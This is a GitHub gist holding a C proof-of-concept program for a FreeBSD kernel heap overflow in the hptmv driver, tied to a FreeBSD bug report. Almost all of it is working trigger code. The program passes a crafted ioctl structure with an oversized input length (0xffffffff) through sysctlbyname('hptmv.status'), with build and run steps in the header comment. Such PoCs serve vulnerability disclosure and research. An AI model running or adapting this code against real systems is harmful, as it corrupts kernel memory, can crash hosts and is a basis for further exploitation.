Skip to content

Instantly share code, notes, and snippets.

@CTurt
Last active January 25, 2016 17:29
Show Gist options
  • Save CTurt/696a34664bc8d4f4e905 to your computer and use it in GitHub Desktop.
Save CTurt/696a34664bc8d4f4e905 to your computer and use it in GitHub Desktop.
FreeBSD hpt_set_info heap overflow PoC
/*
FreeBSD kernel vulnerability PoC for:
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206585#c2
Needs to be run as root.
If hptmv kernel module not loaded:
kldload hptmv
Using:
fetch -o hptmv.c http://192.168.0.4/hptmv.c
clang hptmv.c -o hptmv
./hptmv
- CTurt
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#define HPT_IOCTL_MAGIC 0xA1B2C3D4
typedef int DWORD;
typedef void *LPVOID, *LPDWORD;
typedef struct _HPT_IOCTL_PARAM {
DWORD Magic; /* used to check if it's a valid ioctl packet */
DWORD dwIoControlCode; /* operation control code */
LPVOID lpInBuffer; /* input data buffer */
DWORD nInBufferSize; /* size of input data buffer */
LPVOID lpOutBuffer; /* output data buffer */
DWORD nOutBufferSize; /* size of output data buffer */
LPDWORD lpBytesReturned; /* count of bytes returned */
} HPT_IOCTL_PARAM;
int main(void) {
int result = 0;
errno = 0;
void *buffer = malloc(0x4000);
DWORD bytesReturned;
HPT_IOCTL_PARAM params;
params.Magic = HPT_IOCTL_MAGIC;
params.dwIoControlCode = 0;
params.lpInBuffer = buffer;
params.nInBufferSize = 0xffffffff;
params.lpOutBuffer = buffer;
params.nOutBufferSize = 0x1;
params.lpBytesReturned = &bytesReturned;
size_t size = sizeof(params);
printf("Triggering...\n");
result = sysctlbyname("hptmv.status", NULL, NULL, &params, size);
printf("result %d\n", result);
printf("errno %d\n", errno);
free(buffer);
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment